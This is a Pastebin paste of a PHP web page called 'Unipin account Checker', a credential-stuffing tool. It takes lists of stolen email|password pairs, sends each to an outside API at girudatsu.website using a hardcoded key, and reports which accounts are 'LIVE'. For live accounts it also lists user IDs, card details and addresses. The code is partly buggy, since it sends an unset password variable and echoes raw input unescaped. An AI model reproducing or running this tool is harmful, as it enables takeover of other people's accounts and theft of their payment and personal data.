Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
- <!-- Bootstrap Start -->
- <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
- <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
- <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
- <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
- <title>Unipin Checker</title>
- <style>
- body {
- padding-top: 60px;
- }
- </style>
- </head>
- <body>
- <div class="container">
- <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
- <!-- Start .panel -->
- <div class="panel-heading">
- <h4 class="panel-title">Unipin account Checker</h4>
- </div>
- <div class="panel-body">
- <form action="" method="POST">
- <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="[email protected]|passW0rd"><?php
- if (isset($_POST['mailpass'])) {
- echo $_POST['mailpass'];
- }
- ?></textarea><br />
- <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
- <input type="submit" class="btn btn-success" value="Submit" name="submit"><br><br>
- <?php
- if(isset($_POST['submit'])){
- $girudatsu_key = 'PGn0cpG6RZR97Oj63A0egha';
- $email = '';
- $password = '';
- $output = 'json'; // choose the outpust between text or json. default text. (optional) // change this to choose the text output
- $cetak = '';
- $delim = $_POST['delim'];
- function search($line, $delim)
- {
- $line = str_replace(" ", "", $line);
- $line = explode($delim, $line);
- $i = 0;
- while ($i < count($line)) {
- if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
- $mail = $line[$i];
- $pass = $line[$i + 1];
- $i = 10000;
- if ($pass == "") {
- $pass = $line[$i - 1];
- }
- }
- $i++;
- }
- $line = $mail . "|" . $pass;
- $line = explode('|', $line);
- return $line;
- }
- $data = $_POST['mailpass'];
- $extract = explode("\r\n", $data);
- $i = 0;
- foreach ($extract AS $k => $line)
- {
- $i++;
- if (strpos($line, '=>') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- if (strpos($line, ']') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- if (strpos($line, '[') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- $info = search(trim($line), $delim);
- $email = trim($info[0]);
- $pass = $info[1];
- $params = '&email=' . $email . '&password=' . $password . ((isset($output)) ? '&output=' . $output : "");
- $result = json_decode(file_get_contents("http://girudatsu.website/api/wish?api=". $girudatsu_key . $params), true);
- if ($result['code'] == 0)// if 0 mean LIVE
- {
- $cetak .= 'LIVE | ' .
- $result['data']['email'] . ' | ' .
- $result['data']['password'] . ' | ' .
- $result['data']['userId'] . ' | ' .
- $result['data']['card'] . ' | ' .
- $result['data']['notifCount'] . ' | ' .
- $result['data']['cartCount'] . ' | ' .
- $result['data']['address'] . ' | ' .
- ' Bukhori <br />' ;
- }
- else
- {
- $cetak .= 'DIE | ' .
- $result['data']['email'] . ' | ' .
- $result['data']['password'] . ' | ' .
- ' Bukhori <br />' ;
- }
- }
- echo $cetak;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment